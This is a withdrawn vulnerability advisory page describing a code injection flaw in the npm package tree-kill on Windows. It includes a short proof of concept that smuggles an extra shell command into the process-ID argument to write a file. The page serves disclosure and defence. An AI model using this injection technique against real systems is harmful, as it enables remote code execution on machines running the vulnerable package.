Internet Explorer is no longer supported. Many things will still work, but your experience will be degraded and some things won't function. Please use a modern browser such as Edge, Chrome, or Firefox.
Inedo Security Labs

PGV-22381O7 - Duplicate Advisory: tree-kill vulnerable to remote code execution

Disclosed on May 24, 2022 (updated November 08, 2023)

Vulnerability Has Been Withdrawn

This vulnerability has been withdrawn from the vulnerability database on 11/8/2023 7:16:49 PM.

Vulnerability Overview

PGV-22381O7 is a category 4 vulnerabilty that affects tree-kill, versions ≤ 1.2.1

CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Risk Assessment

customize

The risk assessment shows that this vulnerability is exlpoited by a external attacker. An unauthorized external actor who attempts to exploit this vulnerability without legitimate access.

The impact is contained to the application. Exploitation remains confined to the application and cannot affect the host environment or external systems.

The threat damage is caused by a denial of service. Exploitation can completely deny access to the application, resulting in a full outage.is caused by a data breach. Exploitation can result in full access to data within the system.is caused by data tampering. Exploitation can result in modification of any data (authorized or not) within the system.

Vulnerability Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-884p-74jh-xrg2. Ths link is maintained to preserve external references.

Original Description

A Code Injection exists in tree-kill on Windows which allows a remote code execution when an attacker is able to control the input into the command, which is executed without any check. The issue arises here: https://github.com/pkrumins/node-tree-kill/blob/master/index.js#L20 . While the Linux part is sanitized, the Windows on simply uses the + operand to concatenate the input into exec()

Steps To Reproduce:

Create the following PoC file:

// poc.js
var kill = require('tree-kill');
kill('3333332 & echo "HACKED" > HACKED.txt & ');

Execute the following commands in another terminal:

npm i tree-kill # Install affected module
dir # Check *HACKED.txt* doesn't exist
node poc.js #  Run the PoC
dir # Now *HACKED.txt* exists :)

A new file called HACKED.txt will be created, containing the HACKED string.

Common Weakness Enumerations

  • CWE-94 - Improper Control of Generation of Code ('Code Injection')

Additional References

Your Risk Profile
Network Exposure
External
Accessable from the public internet
Access Interface
WebBrowser
Primarily web-based applications
Service Outage
Disruptive
Operations would be impacted
Data Breach
Disruptive
Operations would be impacted
Data Tampering
Disruptive
Operations would be impacted
Customize
Additional Identifiers
  • GHSA-mxq6-vrrr-ppmg

v2.0.5 © 2026 Inedo, LLC